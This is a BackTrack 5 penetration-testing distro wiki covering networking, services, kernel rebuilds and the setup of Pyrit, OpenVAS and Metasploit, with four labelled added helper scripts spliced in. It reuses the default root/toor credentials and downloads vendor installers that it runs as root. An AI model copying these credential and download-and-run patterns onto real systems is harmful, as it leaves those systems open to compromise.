BackTrack Wiki

BackTrack Wiki for all your basic needs.

Page 1: BackTrack Wiki

Logging in to BackTrack

Once the installation of BackTrack is done, the default username and password required to log in are root / toor.

NOTE: You will not be able to see the password as you type it.

Starting a GUI Environment

After you are logged in you can start the GUI environment by issuing the startx command.

X won't start!

On rare occasions (such as after a VMware Tools install, or when using unsupported video cards), X will refuse to start. If that happens you have several options you can try in order to fix the issue:

Reconfiguring the X server package: you can reset (and often fix) the Xorg configuration with the following command:

root@bt:~# dpkg-reconfigure xserver-xorg

If you are using BackTrack 5 on x64 with KDE you should try the following:

root@bt:~# rm /root/.kde/cache-*

NOTE: Sometimes you may also need to remove the cache folders in /var/tmp by issuing the following command:

root@bt:~# rm -rf /var/tmp/kdecache-*

Getting Networking to work

If you haven't noticed yet, BackTrack does not boot with networking by default, in order to increase its stealth.

Setting your IP manually

We will first set up the networking manually. In the following example we will assume the following addresses and their purpose:

IP Address - 192.168.1.112/24
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1

In order to set these up we will run the following commands:

root@bt:~# ifconfig eth0 192.168.1.112/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

Getting a static IP to stick between reboots

These settings however will only last until you reboot, so if we want to save them between reboots we need to edit the /etc/network/interfaces file like this:

# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
    address 192.168.1.112
    netmask 255.255.255.0
    network 192.168.1.0
    broadcast 192.168.1.255
    gateway 192.168.1.1

Edit the file as appropriate, then have the network come up automatically at boot time:

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart
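The netmask, network and broadcast values in the stanza above all follow from the address in CIDR form (192.168.1.112/24), so they can be derived instead of typed by hand. The script below is an added example, not part of the BackTrack wiki: it computes those values in POSIX sh arithmetic, rejects malformed addresses, refuses a gateway that lies outside the subnet (which would make the route add fail), and prints a ready-to-paste stanza. The interface name and addresses it is run with are constructed samples matching the wiki's example; it writes only to stdout.

```shell
#!/bin/sh
# Added example (not from the BackTrack wiki): derive the netmask, network and
# broadcast values an /etc/network/interfaces static stanza needs from an
# address in CIDR form, sanity-check the gateway, and print the stanza.

ip2int() {                     # dotted quad -> 32-bit integer
    IFS=. read -r a b c d <<EOF
$1
EOF
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

int2ip() {                     # 32-bit integer -> dotted quad
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

prefix2mask() {                # prefix length (0..32) -> mask as an integer
    [ "$1" -eq 0 ] && { echo 0; return; }
    echo $(( (4294967295 << (32 - $1)) & 4294967295 ))
}

valid_ip() {                   # exactly four octets, each 0..255
    IFS=. read -r a b c d <<EOF
$1
EOF
    for o in "$a" "$b" "$c" "$d"; do
        case $o in ''|*[!0-9]*) return 1 ;; esac
        [ "$o" -le 255 ] || return 1
    done
    [ "$a.$b.$c.$d" = "$1" ]   # rejects "1.2.3.4.5": d would be "4.5"
}

netmask_of()   { int2ip "$(prefix2mask "$1")"; }                      # PREFIX
network_of()   { int2ip $(( $(ip2int "$1") & $(prefix2mask "$2") )); } # IP PREFIX
broadcast_of() { int2ip $(( $(ip2int "$1") | (~$(prefix2mask "$2") & 4294967295) )); }

interfaces_stanza() {          # usage: interfaces_stanza IFACE IP PREFIX GATEWAY
    iface=$1; ip=$2; prefix=$3; gw=$4
    valid_ip "$ip" && valid_ip "$gw" || { echo "bad address" >&2; return 1; }
    case $prefix in ''|*[!0-9]*) return 1 ;; esac
    [ "$prefix" -le 32 ] || return 1
    # The gateway must sit inside the subnet, or 'route add default gw' fails.
    [ "$(network_of "$ip" "$prefix")" = "$(network_of "$gw" "$prefix")" ] ||
        { echo "gateway $gw is not in $(network_of "$ip" "$prefix")/$prefix" >&2; return 2; }
    printf 'auto %s\niface %s inet static\n' "$iface" "$iface"
    printf '    address %s\n    netmask %s\n    network %s\n    broadcast %s\n    gateway %s\n' \
        "$ip" "$(netmask_of "$prefix")" "$(network_of "$ip" "$prefix")" \
        "$(broadcast_of "$ip" "$prefix")" "$gw"
}

# Constructed sample matching the wiki's addresses; prints the stanza to stdout.
interfaces_stanza eth0 192.168.1.112 24 192.168.1.1
```

To use it for real, append the printed stanza to /etc/network/interfaces after the loopback block, then run the update-rc.d and networking restart commands shown above.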

Getting an IP from DHCP

In order to get an IP from a DHCP server we can issue the dhclient <interface> command as follows:

root@bt:~# dhclient eth0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/eth0/00:0c:29:81:74:21
Sending on   LPF/eth0/00:0c:29:81:74:21
Sending on   Socket/fallback
DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.112 from 192.168.1.1
bound to 192.168.1.112 -- renewal in 37595 seconds.
root@bt:~#

Using the script to start networking

There is a script to start networking in the /etc/init.d directory which attempts to start every interface listed in /etc/network/interfaces (you can remove the ones you don't need). To start it issue the following command:

root@bt:~# /etc/init.d/networking start

WICD Network Manager

Another way to set up your networking is using the WICD Network Manager; you can find it in the menu:

Menu > Internet > Wicd Network Manager

NOTE: When starting WICD you will get an error. In order to get rid of this error you have to reboot BackTrack, then BEFORE starting WICD open up a terminal and type in the following:

root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults

Now after a reboot the error should not occur anymore.

Changing the root password

As you know, BackTrack comes with a default username and password (root/toor). It is IMPORTANT that we change that root password, especially when running services such as SSH. We can change the password by issuing the passwd command:

root@bt:~# passwd
Enter new UNIX password: {enter your new password here}
Retype new UNIX password: {enter your new password again}
passwd: password updated successfully
root@bt:~#

Starting services

BackTrack has various services such as Apache, SSH, MySQL, VNC, etc. They are all disabled by default. To start a service such as SSH, you can use the service init scripts. For example, to start the SSH service:

root@bt:~# sshd-generate # Specific to the SSH service - needed to generate SSH keys
root@bt:~# /etc/init.d/ssh start
Starting OpenBSD Secure Shell server: sshd.
root@bt:~# /etc/init.d/ssh stop
Stopping OpenBSD Secure Shell server: sshd.
root@bt:~#

When using an SSH server for the first time on BackTrack you will need to generate keys:

root@bt:~# sshd-generate

To enable a service at boot time, you can use the update-rc.d command; for example, having SSH start at boot time:

root@bt:~# update-rc.d -f ssh defaults
 Adding system startup for /etc/init.d/ssh ...
   /etc/rc0.d/K20ssh -> ../init.d/ssh
   /etc/rc1.d/K20ssh -> ../init.d/ssh
   /etc/rc6.d/K20ssh -> ../init.d/ssh
   /etc/rc2.d/S20ssh -> ../init.d/ssh
   /etc/rc3.d/S20ssh -> ../init.d/ssh
   /etc/rc4.d/S20ssh -> ../init.d/ssh
   /etc/rc5.d/S20ssh -> ../init.d/ssh
root@bt:~#
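Because update-rc.d records its decision as S??name symlinks in the rc directories shown above, the set of services that will come up at boot can be audited by reading those links back. The script below is an added example and not part of the wiki: it lists the services enabled for a runlevel, answers whether a given one (such as ssh) is enabled, and flags S-links whose init script has since been removed. It runs against any directory, so the demonstration uses a constructed fixture tree built with mktemp rather than the live /etc.

```shell
#!/bin/sh
# Added example (not from the BackTrack wiki): audit which services update-rc.d
# has enabled for a runlevel by reading the S??name symlinks in an rcN.d
# directory, and report any whose init script is missing.

enabled_services() {           # usage: enabled_services RC_DIR   (e.g. /etc/rc2.d)
    for link in "$1"/S[0-9][0-9]*; do
        [ -e "$link" ] || [ -L "$link" ] || continue   # no match: glob stays literal
        name=${link##*/}            # S20ssh
        echo "${name#S[0-9][0-9]}"  # ssh
    done
}

service_enabled() {            # usage: service_enabled NAME RC_DIR ; exit 0 if enabled
    enabled_services "$2" | grep -qx -- "$1"
}

dangling_links() {             # S-links whose target init script no longer exists
    for link in "$1"/S[0-9][0-9]*; do
        [ -L "$link" ] || continue
        [ -e "$link" ] || echo "${link##*/}"
    done
}

make_fixture() {               # constructed /etc-like tree for trying the checks offline
    d=$(mktemp -d)
    mkdir -p "$d/init.d" "$d/rc2.d"
    printf '#!/bin/sh\n' > "$d/init.d/ssh"
    printf '#!/bin/sh\n' > "$d/init.d/apache2"
    ln -s ../init.d/ssh     "$d/rc2.d/S20ssh"
    ln -s ../init.d/apache2 "$d/rc2.d/K20apache2"   # K = stop link, not an enable
    ln -s ../init.d/gone    "$d/rc2.d/S30gone"      # script removed, link left behind
    echo "$d"
}

fixture=$(make_fixture)
echo "enabled:";  enabled_services "$fixture/rc2.d"
echo "dangling:"; dangling_links "$fixture/rc2.d"
rm -rf "$fixture"
```

On a real BackTrack (Debian-based, default runlevel 2) the same functions read /etc/rc2.d: enabled_services /etc/rc2.d lists everything that starts at boot, and service_enabled ssh /etc/rc2.d tells you whether the update-rc.d step above took effect.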

Common apt commands

apt-get install <package> - Downloads <package> and all of its dependencies, and installs or upgrades them.

apt-get remove [--purge] <package> - Removes <package> and any packages that depend on it. --purge specifies that packages should be purged.

apt-get update - Updates package listings from the repo; should be run at least once a week.

apt-get upgrade - Upgrades all currently installed packages with those updates available from the repo; should be run once a week.

apt-get dist-upgrade [-u] - Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.

apt-cache search <pattern> - Searches packages and descriptions for <pattern>.

apt-cache show <package> - Shows the full description of <package>.

apt-cache showpkg <package> - Shows a lot more detail about <package>, and its relationships to other packages.

man apt - Will give you more info on these commands as well as many that are in less common usage.

Common dpkg commands

dpkg -i <package.deb> - Installs a package file; one that you downloaded manually, for example.

dpkg -c <package.deb> - Lists the contents of <package.deb>, a .deb file.

dpkg -I <package.deb> - Extracts package information from <package.deb>, a .deb file.

dpkg -r <package> - Removes an installed package named <package>.

dpkg -P <package> - Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.

dpkg -L <package> - Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.

dpkg -s <package> - Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.

dpkg-reconfigure <package> - Reconfigures an installed package.

man dpkg - Will give you more info on these commands as well as many that are in less common usage.

How do I find more information on a particular command or program's usage?

Most commands will have what is called a man page (manual page) which can be viewed by typing:

root@bt:~# man <command you want more info on>

Another very good resource on Linux command usage can be found at linuxcommand.org

Some programs do not have a man page, but you can usually get more information on their usage by typing:

root@bt:~# <program name>    (just the program name without any arguments)

or

root@bt:~# <program name> -help

or

root@bt:~# <program name> --help

or

root@bt:~# <program name> -h

Some programs use other methods, but they are usually just a variation of one of the above five commands.

Compiling code that requires kernel headers

Occasionally you might want to compile code that requires kernel headers (such as compat-wireless, or other drivers). These are quick instructions on how to do so.

root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:/usr/src/linux# cp -rf include/generated/* include/linux/

NOTE: You need to be connected to the internet in order to download the linux-source package.

Enable PAE on BackTrack 5 R2

NOTE: Do not change any other settings in your kernel unless you know exactly what you are doing!

In this tutorial we will proceed to enable PAE on BackTrack 5 R2.

We first prepare our kernel sources and enter the kernel menuconfig:

root@bt:~# prepare-kernel-sources
root@bt:/usr/src/linux# zcat /proc/config.gz > .config
root@bt:/usr/src/linux# make menuconfig

After we have launched the ncurses menuconfig we proceed to enable PAE, which can be found at the following: Processor type and features -> High Memory Support(4) -> 64GB

Once we have enabled PAE from the menuconfig we proceed to build our kernel:

root@bt:/usr/src/linux# make scripts
root@bt:/usr/src/linux# make prepare
root@bt:/usr/src/linux# make
root@bt:/usr/src/linux# update-initramfs -u
root@bt:~# update-grub2

We then reboot and check to see if PAE is enabled:

root@bt:~# cat /boot/config-3.2.4 | grep HIGHMEM
# CONFIG_HIGHMEM64G is not set
CONFIG_HIGHMEM=y

NOTE: Changing additional options in the ncurses config without knowing what the options do might break your kernel!
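The grep above works, but a kernel config has two different ways of saying "off": a "# CONFIG_X is not set" line, and the option being absent from the file altogether (which usually means the option does not exist for that kernel or is hidden by another choice). The script below is an added example, not from the wiki: it reads a .config or /boot/config-* file (or the gzip form used by /proc/config.gz), reports an option's state as y, m, a value, "not set" or "absent", and wraps that into a PAE check. The sample config it builds is constructed to mirror the grep output shown above.

```shell
#!/bin/sh
# Added example (not from the BackTrack wiki): read a kernel option from a
# Kconfig-style config file (plain or gzip) and distinguish "not set" from
# "absent", then use it to test whether the running config is a PAE build.

kconfig_read() {               # usage: kconfig_read FILE ; prints the config text
    case $1 in *.gz) zcat "$1" ;; *) cat "$1" ;; esac
}

kconfig_state() {              # usage: kconfig_state CONFIG_NAME FILE
    line=$(kconfig_read "$2" | grep -E "^(# )?$1( is not set|=)" | head -n 1)
    case $line in
        "# $1 is not set") echo "not set" ;;
        "$1="*)            echo "${line#*=}" ;;   # y, m, or a value such as 17
        *)                 echo "absent"; return 1 ;;
    esac
}

pae_enabled() {                # usage: pae_enabled FILE ; exit 0 when CONFIG_HIGHMEM64G=y
    [ "$(kconfig_state CONFIG_HIGHMEM64G "$1")" = "y" ]
}

make_sample_config() {         # constructed sample, not a real BackTrack config
    f=$(mktemp)
    cat > "$f" <<'EOF'
# CONFIG_HIGHMEM64G is not set
CONFIG_HIGHMEM=y
CONFIG_HIGHMEM4G=y
CONFIG_LOG_BUF_SHIFT=17
EOF
    echo "$f"
}

sample=$(make_sample_config)
echo "CONFIG_HIGHMEM64G: $(kconfig_state CONFIG_HIGHMEM64G "$sample")"
pae_enabled "$sample" && echo "PAE build" || echo "non-PAE build"
rm -f "$sample"
```

On the box itself, pae_enabled /proc/config.gz checks the running kernel and pae_enabled /boot/config-3.2.4 checks the installed one; after the rebuild above the two should agree.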

Enable b43 drivers in BackTrack 5 R2

Enabling b43 drivers in BT5 R2 will require recompiling your kernel.

root@bt:~# apt-get dist-upgrade
root@bt:~# prepare-kernel-sources
root@bt:/usr/src/linux# zcat /proc/config.gz > .config
root@bt:/usr/src/linux# make menuconfig

Configure your kernel to use b43 instead of the default brcmsmac drivers by selecting the BCMA support option. To get to this option, navigate to:

Device Drivers -> Broadcom specific AMBA

Add the BCMA support as a module, and "Support for BCMA on PCI-host bus" (the wiki shows this step as a screenshot).

Exit the ncurses menuconfig, and build your kernel package:

root@bt:/usr/src/linux# make prepare
root@bt:/usr/src/linux# make
root@bt:/usr/src/linux# make modules_install
root@bt:/usr/src/linux# make install
root@bt:/usr/src/linux# update-initramfs -u
root@bt:/usr/src/linux# update-grub2

Install Java

This article was contributed by g0tmi1k.
Twitter: https://twitter.com/#!/g0tmi1k

NOTE: Before installing Java make sure you kill Firefox.

root@bt:~# killall -9 /opt/firefox/firefox-bin

Downloading Java.

We can download Java using wget:

root@bt:~# wget http://javadl.sun.com/webapps/download/AutoDL?BundleId=52240 -O /tmp/java.bin

Creating the directories and running the self extraction:

root@bt:~# mkdir -p /opt/java && cd /opt/java
root@bt:/opt/java# chmod +x /tmp/java.bin && /tmp/java.bin

Final changes:

root@bt:~# update-alternatives --install /usr/bin/java java /opt/java/jre1.6.?_??/bin/java 1
root@bt:~# update-alternatives --set java /opt/java/jre1.6.?_??/bin/java

Adding the plugin to Firefox:

root@bt:~# mkdir -p /usr/lib/mozilla/plugins/
root@bt:~# ln -sf /opt/java/jre1.6.?_??/lib/i386/libnpjp2.so /usr/lib/mozilla/plugins/
root@bt:~# export JAVA_HOME="/opt/java/jre1.6.?_??"   # the JRE directory, not the java binary

Testing the plugin:

root@bt:~# firefox http://java.com/en/download/testjava.jsp

Installing FluxBox on BackTrack 5

Now if you didn't know this already, besides Gnome and KDE, BackTrack 5 also comes with a lighter window manager called FluxBox; for more details you can visit their official page.

Getting FluxBox on BackTrack 5 is pretty easy; even the BackTrack menu will be automatically generated, so let's get on with it!

First we need to install the flux-for-back package, which will grab everything we need in order to get FluxBox running.

root@bt:~# apt-get install flux-for-back

After the package is installed we will see that it automatically starts to set up FluxBox. Once the script is finished you will be presented with a message which tells you to start your FluxBox.

However, before we restart there is one thing that we have to do: we have to tell BackTrack to run FluxBox on the startx command and not its default WM.

root@bt:~# echo exec /usr/bin/startfluxbox > ~/.xinitrc
root@bt:~# shutdown -r 0

Reboot your BackTrack and enjoy FluxBox!

NOTE: In order to revert back to the default WM all you have to do is delete the .xinitrc file.

root@bt:~# rm -rf ~/.xinitrc
root@bt:~# shutdown -r 0

Install Flash Player

As you may have noticed, Flash Player does not work on BackTrack 5, so in order to fix this we first need to remove the current Flash player by issuing the following commands:

root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla
root@bt:~# rm -f /usr/lib/firefox/plugins/*flash*
root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash*
root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash*
root@bt:~# rm -f ~/.mozilla/plugins/*flash*so
root@bt:~# rm -rfd /usr/lib/nspluginwrapper

After removing Flash we need to get the new Flash player from the official website:

1. Flash x64 - ONLY FOR x64.
2. Flash Player - download the .tar.gz file.

We will begin with Flash Square; SKIP THIS if you aren't using an x64 version of BackTrack.

root@bt:~# tar xvfz flashplayer10_2_p3_64bit_linux_111710.tar.gz
root@bt:~# chown root:root libflashplayer.so
root@bt:~# chmod 644 libflashplayer.so
root@bt:~# cp -f libflashplayer.so /usr/lib/mozilla/plugins/
root@bt:~# rm -rf libflashplayer.so
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/

Next up we will take care of the Flash Player:

root@bt:~# tar xvfz install_flash_player_10_linux.tar.gz
root@bt:~# mkdir ~/.mozilla/plugins
root@bt:~# mv -f libflashplayer.so ~/.mozilla/plugins/
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox-addons/plugins/
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/xulrunner-addons/plugins/

Install OpenCL on BackTrack

This article was contributed by g0tmi1k.
Twitter: https://twitter.com/#!/g0tmi1k

In this guide we will be installing and configuring OpenCL on BackTrack.

NOTE: You might need to make some minor tweaks depending on your system.

Let's begin:

First of all, before we start we want to make sure that our system is up to date.

root@bt:~# apt-get update && apt-get upgrade

Before we go on with installing the ATI drivers we need to get our kernel source prepared.

root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:/usr/src/linux# cp -rf include/generated/* include/linux/

Now that we are set up it's time to download the ATI drivers.

root@bt:~# wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-9-x86.x86_64.run
root@bt:~# chmod +x ati-driver-installer-11-9-x86.x86_64.run
root@bt:~# ./ati-driver-installer-11-9-x86.x86_64.run
root@bt:~# reboot

Before we are finished there is one more thing that we need to install: the AMD Accelerated Parallel Processing (APP) SDK. This one needs to be installed according to your CPU architecture.

For 32 bit architecture:

root@bt:~# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx32.tgz
root@bt:~# tar -xvzf AMD-APP-SDK-v2.5-lnx32.tgz
root@bt:~# ./Install-AMD-APP.sh

For 64 bit architecture:

root@bt:~# wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx64.tgz
root@bt:~# tar -xvzf AMD-APP-SDK-v2.5-lnx64.tgz
root@bt:~# ./Install-AMD-APP.sh

We will also need cmake and CAL++ (calpp) along with some other library files.

First we install the libraries and cmake:

root@bt:~# apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev cmake libboost1.40-all-dev

Before we can install CAL++ we need to set the ATI Stream paths:

root@bt:~# echo "ATISTREAMSDKROOT=/opt/AMDAPP" >> ~/.bashrc
root@bt:~# echo "export ATISTREAMSDKROOT" >> ~/.bashrc
root@bt:~# source ~/.bashrc

Now we can proceed with the installation:

root@bt:~# svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp
root@bt:~# cd calpp/trunk
root@bt:~/calpp/trunk# cmake .
root@bt:~/calpp/trunk# make
root@bt:~/calpp/trunk# make install

In addition, now we can install Pyrit with the OpenCL option.

root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ /tmp/pyrit
root@bt:~# cd /tmp/pyrit/pyrit && python setup.py build && python setup.py install
root@bt:~# cd /tmp/pyrit/cpyrit_opencl && python setup.py build && python setup.py install

Now we can test Pyrit.

root@bt:~# pyrit list_cores
root@bt:~# pyrit benchmark

Configuring Autoscan in BackTrack 5

What is Autoscan?

In short, Autoscan is a network discovery and management application. Its main purpose is to quickly identify connected machines/equipment in a network environment.

Let's quickly configure Autoscan in BackTrack 5; you can find it using the menu in:

BackTrack -> Information Gathering -> Network Analysis -> Network Scanners -> autoscan

As soon as we launch it from the menu we will begin our configuration wizard; click on Forward to move on.

Now we are going to configure a new Network and add our own data by clicking the Add button.

Select your network interface (wlan0 in this case).

After that we are asked to confirm our settings.

Here is some output similar to what you will see on some devices (the wiki shows each of these steps as a screenshot).

Unicornscan

Unicornscan is an awesome "payload sender" which can also act as an asynchronous scanner. Thanks to dash1b and his awesome patch-up script, we were able to quickly implement the full features of the scanner in BackTrack 5. To install Unicornscan on BackTrack 5 (if not already installed), type:

root@bt:~# apt-get update
root@bt:~# apt-get install unicornscan

Next, run the postgres-setup script, which was taken mostly from http://code.google.com/p/unicornscan-bt5-install-script/. This script will set up the Framework3 PostgreSQL server as the DB back-end for Unicornscan.

Start Apache, and browse to http://127.0.0.1/unicornscan. Initiate a scan using the -epgsqldb option.

Installing OpenVAS

The simplest way of installing all of the required parts of the OpenVAS suite is to issue the following commands in a terminal window.

root@bt:~# apt-get update
root@bt:~# apt-get install openvas

The package openvas is a "master" package that holds all of the info required to automatically download all of the other packages that make up the full OpenVAS suite of tools.

Location of OpenVAS menu entries

Once OpenVAS has been installed you will find all of the menu entries in this location (the wiki shows the menu as a screenshot).

OpenVAS check setup

openvas-check-setup is a very useful tool; the wiki's screenshot shows how it can help diagnose problems and give advice on how to fix them.

Setting up OpenVAS

Step 1. Adding a user

From the menu, select OpenVAS Adduser and follow the instructions.

Note that you can use any username you like, but in this case I have just used root. I have left it at the default of password authentication, as I am going to be using this on a local machine and to save having to worry about users needing certs, but this is entirely up to you. You cannot have an empty password, so I have used toor in this case.

For the rules applied to this user I have left them blank by pressing ctrl-d. This means that this user will be able to perform any tasks without any restrictions.

Step 2. Making the Certificate

From the menu, select OpenVAS mkcert and follow the instructions.

Here we create the SSL cert. This is used if you decided to use cert instead of password when you created the user, but you are required to create it anyway even if you decide not to use certs.

Step 3. Syncing the NVTs

At this point we need to get the latest set of NVTs. These are what the scanner uses to detect the vulnerabilities in what you are scanning. Please note you will need to do this quite regularly, and the first time you do it could take a while depending on the speed of your computer and internet connection.

So select OpenVAS NVT Sync from the menu.

Step 4. Starting the scanner

Start OpenVAS scanner

Now we are ready to start the scanner.

This WILL take a while the first time you start it, as it checks and loads the new NVTs you have downloaded in the previous step.

Note the time in the corner! This was in a VM so it should be much quicker for you.

Subsequent starts will be quick unless you have not updated in quite some time.

Please remember that the scanner runs as a daemon in the background and will keep running until you reboot or stop it with the menu entry provided.

Step 5. Setup OpenVAS manager

Setting up OpenVAS manager

First thing we need to do is make a client cert for OpenVAS manager. This is done by running the following command:

openvas-mkcert-client -n om -i

Now we need to rebuild the database, as it is now out of date with the added NVTs and we would otherwise get errors about the database. You should do this each time you update the NVTs. This is done with a simple command:

openvasmd --rebuild

This process will only take a few seconds if using openvas-libraries version 4.0.3 or below. This process can take much longer if using openvas-libraries version 4.0.5 or above. The tradeoff for this extra time is much greater scanning capabilities, so it is worth it.

Step 6. Setup OpenVAS Administrator

Setting up OpenVAS Administrator

We need to create an administrative user that we will be using to perform all of our vulnerability assessments. This is done by running the following command:

openvasad -c 'add_user' -n openvasadmin -r Admin

openvasadmin is the username I have chosen to become this user; you however can substitute that with something better suited to you if you so choose. Make sure you can remember this username and associated password as you WILL need it when running OpenVAS.

root@bt:~# openvasad -c 'add_user' -n openvasadmin -r Admin
Enter password:
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will have no restrictions.
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully created.
root@bt:~#

Starting OpenVAS Manager

Now we need to start OpenVAS Manager. This runs as a daemon in the background. As I am running everything from my local machine I will be using localhost to listen on and, in this case, the default port. This is done by running the following command:

openvasmd -p 9390 -a 127.0.0.1

Starting OpenVAS Administrator

Now we need to start OpenVAS Administrator. This also runs as a daemon in the background. As I am running everything from my local machine I will be using localhost to listen on and, in this case, the default port. This is done by running the following command:

openvasad -a 127.0.0.1 -p 9393

Starting Greenbone Security Assistant

Now we need to start Greenbone Security Assistant. This again runs as a daemon in the background. As I am running everything from my local machine I will be using localhost to listen on and, in this case, the default port. This is done by running the following command:

gsad --http-only --listen=127.0.0.1 -p 9392

More info on the above commands and other options can be found by running their associated menu entry and by looking at the man pages. As all three of these run as a daemon and will continue running until you shut down your computer, I have provided menu entries for you so that you can stop them when you no longer need them.

At this point your installation is essentially complete, but as we have got this far we may as well continue to make sure everything is working as expected.
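All three daemons above are deliberately bound to 127.0.0.1; if one of them is started without its -a / --listen option it ends up on every interface, and the openvasadmin credentials and the --http-only web interface become reachable from the network. The script below is an added example, not part of the wiki: it parses netstat -ltn style output, lists every TCP listener that is not on a loopback address, and checks the three OpenVAS ports against that list. The SAMPLE it runs on is constructed output (with gsad deliberately misbound to 0.0.0.0:9392), not captured from a real host.

```shell
#!/bin/sh
# Added example (not from the BackTrack wiki): confirm that openvasmd (9390),
# gsad (9392) and openvasad (9393) are bound to 127.0.0.1 only, by parsing
# `netstat -ltn` / `ss -ltn` style output.

OPENVAS_PORTS="9390 9392 9393"

# Constructed sample of `netstat -ltn` output; gsad is misbound on purpose.
SAMPLE='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:9390          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:9393          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:9392            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp6       0      0 :::3306                 :::*                    LISTEN'

# Print "addr:port" for every TCP listener whose address is not loopback.
exposed_listeners() {          # reads netstat -ltn output on stdin
    awk '$1 ~ /^tcp/ && $NF == "LISTEN" {
            addr = $4; sub(/:[0-9]+$/, "", addr)      # strip the port
            if (addr != "127.0.0.1" && addr != "::1") print $4
        }'
}

# Exit 0 if none of PORTS is exposed off-loopback; otherwise print them and exit 1.
check_ports_loopback() {       # usage: check_ports_loopback "PORTS" "NETSTAT_TEXT"
    exposed=$(printf '%s\n' "$2" | exposed_listeners)
    bad=0
    for p in $1; do
        hit=$(printf '%s\n' "$exposed" | grep -E ":$p\$") &&
            { echo "exposed off-loopback: $hit"; bad=1; }
    done
    return $bad
}

echo "all non-loopback listeners:"
printf '%s\n' "$SAMPLE" | exposed_listeners
if check_ports_loopback "$OPENVAS_PORTS" "$SAMPLE"; then
    echo "all OpenVAS listeners are loopback-only"
fi
# On the live box: check_ports_loopback "$OPENVAS_PORTS" "$(netstat -ltn)"
```

The wildcard IPv6 address shows up as ":::3306" in netstat output, which is why the address is recovered by stripping the trailing ":port" rather than by splitting on the first colon.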

OpenVAS user interfaces

Greenbone Security Desktop

Now we need to start an application to enable you to communicate with the scanner and other daemons. The first of these choices is Greenbone Security Desktop.

Start this from the menu item and fill in the credentials and details we created earlier, then click the login button.

Once logged in you can use this as your scanning interface, or use the next choice if you prefer.

Web interface

This next method is via a web interface. Open your favorite browser and enter the following address:

127.0.0.1:9392

You will then be presented with a login page. Login with the credentials we created earlier.

Once you have logged in, you will notice that your CPU usage will hit the roof; don't worry, this will return to normal in a short while.

Here you can perform and set up all of your scanning tasks. It is a good idea to set NoScript to Temporarily allow 127.0.0.1 or you may get unexpected results.

There is much more to OpenVAS than I have included here, but this is only intended to get you up and running quickly. Scans and more advanced setups are beyond the scope of this simple tutorial. Don't forget about some of the other parts of OpenVAS contained within the menu that I have not covered here, and also the man pages.

Once you have completed the setup process

Starting OpenVAS with Greenbone Security Desktop as the scanning interface

From the menu select:

Openvas NVT sync
Start Openvas scanner

then in a terminal window:

openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392

Then from the menu:

Start Greenbone Security Desktop

and login. You are now ready to set up your scanning tasks.

Starting OpenVAS with a web browser as the scanning interface

From the menu select:

Openvas NVT sync
Start Openvas scanner

then in a terminal window:

openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392

Then open your browser to the address http://127.0.0.1:9392 and login. You are now ready to set up your scanning tasks.

Metasploit Framework with MySQL Support

With a recent bugfix, we have simplified the steps required to use MySQL as a back-end to the Metasploit Framework.

root@bt:~# apt-get update
root@bt:~# apt-get dist-upgrade
root@bt:~# service mysql start
root@bt:~# msfconsole

A db_driver command should show the availability of the MySQL option:

msf > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql, mysql
msf >

Go ahead and connect to the database using the default MySQL root password toor:

msf > db_driver mysql
[*] Using database driver mysql
msf > db_connect root:toor@127.0.0.1/msf3
msf >

Wireless Drivers

BackTrack 5 R2

BackTrack 5 R2 contains patched stock kernel 3.2.6 wireless drivers with several injection patches applied.

b43

BackTrack 5 R2 has switched from b43 drivers to brcmsmac drivers. If you need to enable the b43 drivers, follow this howto - http://www.backtrack-linux.org/wiki/index.php?title=Enable_b43_drivers_in_Backtrack5_r2.

BackTrack 5 R1

